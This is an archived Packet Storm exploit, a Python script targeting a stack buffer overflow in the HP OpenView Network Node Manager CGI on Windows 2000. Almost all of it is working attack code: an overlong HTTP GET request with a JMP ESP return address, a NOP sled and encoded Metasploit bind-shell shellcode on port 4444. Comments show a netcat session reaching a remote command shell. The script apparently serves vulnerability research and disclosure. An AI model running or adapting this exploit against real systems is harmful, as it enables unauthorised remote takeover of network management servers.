hpopen-overflow.txt

2007-12-12T00:00:00
ID PACKETSTORM:61762
Type packetstorm
Reporter Mati Aharoni
Modified 2007-12-12T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
# HP OpenView Network Node Manager CGI Buffer Overflow  
# Tested on NNM Release B.07.50 / Windows 2000 server SP4  
# http://www.zerodayinitiative.com/advisories/ZDI-07-071.html  
# Coded by Mati Aharoni  
# muts|offensive-security|com  
# http://www.offensive-security.com/0day/hpnnm.txt  
# Notes:  
# Vanilla stack based overflow   
# I had no idea how to debug this...I ended up modifying the Openview5.exe binary by hijacking   
# the entry point and injecting Sleep just before exe execution. This gave me enough   
# time to attach a debugger before program termination. If anyone knows how to properly   
# debug this, please tell me about it - there *must* be a better way...  
#  
# bt tools # ./sploit 192.168.1.105  
# [+] Connecting to 192.168.1.105  
# [+] Sending Evil Buffer to NNM CGI  
# [+] Payload Sent, ph33r.  
#  
# bt tools # nc -nv 192.168.1.105 4444  
# (UNKNOWN) [192.168.1.105] 4444 (krb524) open  
# Microsoft Windows 2000 [Version 5.00.2195]  
# (C) Copyright 1985-2000 Microsoft Corp.  
#  
# C:\Program Files\HP OpenView\www\cgi-bin>  
  
import socket  
import os  
import sys  
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )  
print "[+] Connecting to "+sys.argv[1]  
expl.connect ( ( sys.argv[1], 80 ) )  
print "[+] Sending Evil Buffer to NNM CGI\n"  
buffer="GET /OvCgi/OpenView5.exe?Context=Snmp&Action="  
buffer+="A"*5123  
buffer+="\x29\x4c\xe1\x77" # JMP ESP user32.dll Win2kSP4  
buffer+="\x90"*32  
# EXITFUNC=thread LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */  
buffer+=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"  
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x48\x5a\x6a\x68"  
"\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x78\x32\x41\x42\x32\x42"  
"\x41\x30\x42\x41\x41\x58\x38\x41\x42\x50\x75\x6b\x59\x39\x6c\x50"  
"\x6a\x78\x6b\x30\x4d\x49\x78\x38\x79\x59\x6f\x4b\x4f\x39\x6f\x71"  
"\x70\x6e\x6b\x50\x6c\x67\x54\x67\x54\x4c\x4b\x72\x65\x65\x6c\x4c"  
"\x4b\x41\x6c\x36\x65\x42\x58\x46\x61\x4a\x4f\x6c\x4b\x70\x4f\x64"  
"\x58\x4c\x4b\x73\x6f\x47\x50\x76\x61\x7a\x4b\x50\x49\x6c\x4b\x55"  
"\x64\x4e\x6b\x54\x41\x7a\x4e\x65\x61\x6f\x30\x6d\x49\x6c\x6c\x4e"  
"\x64\x4f\x30\x71\x64\x35\x57\x49\x51\x4a\x6a\x56\x6d\x63\x31\x5a"  
"\x62\x5a\x4b\x79\x64\x77\x4b\x61\x44\x57\x54\x45\x78\x63\x45\x78"  
"\x65\x6c\x4b\x33\x6f\x44\x64\x53\x31\x48\x6b\x41\x76\x4c\x4b\x54"  
"\x4c\x30\x4b\x6e\x6b\x43\x6f\x45\x4c\x66\x61\x78\x6b\x66\x63\x76"  
"\x4c\x4c\x4b\x6c\x49\x42\x4c\x71\x34\x65\x4c\x50\x61\x48\x43\x50"  
"\x31\x6b\x6b\x30\x64\x4c\x4b\x50\x43\x70\x30\x4e\x6b\x31\x50\x64"  
"\x4c\x6c\x4b\x74\x30\x47\x6c\x6e\x4d\x6e\x6b\x63\x70\x75\x58\x63"  
"\x6e\x62\x48\x4c\x4e\x50\x4e\x74\x4e\x5a\x4c\x50\x50\x4b\x4f\x4b"  
"\x66\x30\x66\x30\x53\x33\x56\x73\x58\x66\x53\x30\x32\x75\x38\x70"  
"\x77\x53\x43\x54\x72\x33\x6f\x76\x34\x6b\x4f\x6e\x30\x62\x48\x6a"  
"\x6b\x38\x6d\x49\x6c\x67\x4b\x50\x50\x4b\x4f\x48\x56\x61\x4f\x6c"  
"\x49\x38\x65\x65\x36\x4b\x31\x4a\x4d\x47\x78\x43\x32\x32\x75\x73"  
"\x5a\x64\x42\x79\x6f\x38\x50\x75\x38\x7a\x79\x46\x69\x7a\x55\x6c"  
"\x6d\x66\x37\x59\x6f\x6e\x36\x76\x33\x30\x53\x30\x53\x50\x53\x51"  
"\x43\x42\x63\x70\x53\x51\x53\x53\x63\x4b\x4f\x4e\x30\x33\x56\x62"  
"\x48\x54\x51\x53\x6c\x61\x76\x52\x73\x4e\x69\x5a\x41\x6e\x75\x75"  
"\x38\x4d\x74\x66\x7a\x34\x30\x6a\x67\x32\x77\x6b\x4f\x79\x46\x51"  
"\x7a\x46\x70\x51\x41\x70\x55\x4b\x4f\x38\x50\x53\x58\x4e\x44\x4c"  
"\x6d\x66\x4e\x78\x69\x33\x67\x49\x6f\x6e\x36\x50\x53\x31\x45\x6b"  
"\x4f\x5a\x70\x75\x38\x4d\x35\x42\x69\x6b\x36\x30\x49\x71\x47\x79"  
"\x6f\x59\x46\x56\x30\x50\x54\x70\x54\x30\x55\x79\x6f\x48\x50\x4f"  
"\x63\x52\x48\x7a\x47\x70\x79\x59\x56\x54\x39\x51\x47\x59\x6f\x58"  
"\x56\x50\x55\x79\x6f\x58\x50\x52\x46\x73\x5a\x61\x74\x63\x56\x33"  
"\x58\x65\x33\x52\x4d\x4d\x59\x4b\x55\x33\x5a\x70\x50\x56\x39\x44"  
"\x69\x6a\x6c\x4d\x59\x59\x77\x71\x7a\x67\x34\x4c\x49\x7a\x42\x54"  
"\x71\x4b\x70\x79\x63\x4c\x6a\x4b\x4e\x52\x62\x64\x6d\x49\x6e\x30"  
"\x42\x56\x4c\x4d\x43\x4c\x4d\x72\x5a\x77\x48\x6c\x6b\x4c\x6b\x6c"  
"\x6b\x32\x48\x31\x62\x49\x6e\x6f\x43\x77\x66\x6b\x4f\x50\x75\x51"  
"\x54\x6b\x4f\x7a\x76\x61\x4b\x72\x77\x66\x32\x70\x51\x36\x31\x33"  
"\x61\x53\x5a\x65\x51\x72\x71\x61\x41\x30\x55\x41\x41\x79\x6f\x48"  
"\x50\x32\x48\x6c\x6d\x6e\x39\x45\x55\x58\x4e\x61\x43\x69\x6f\x6a"  
"\x76\x53\x5a\x39\x6f\x4b\x4f\x46\x57\x69\x6f\x6a\x70\x4e\x6b\x73"  
"\x67\x49\x6c\x6d\x53\x49\x54\x70\x64\x6b\x4f\x4b\x66\x61\x42\x6b"  
"\x4f\x48\x50\x33\x58\x4a\x4f\x58\x4e\x6d\x30\x35\x30\x33\x63\x4b"  
"\x4f\x6b\x66\x79\x6f\x58\x50\x68")  
buffer+="\r\n\r\n"  
  
expl.send (buffer)  
expl.close()  
print "[+] Payload Sent, ph33r."  
`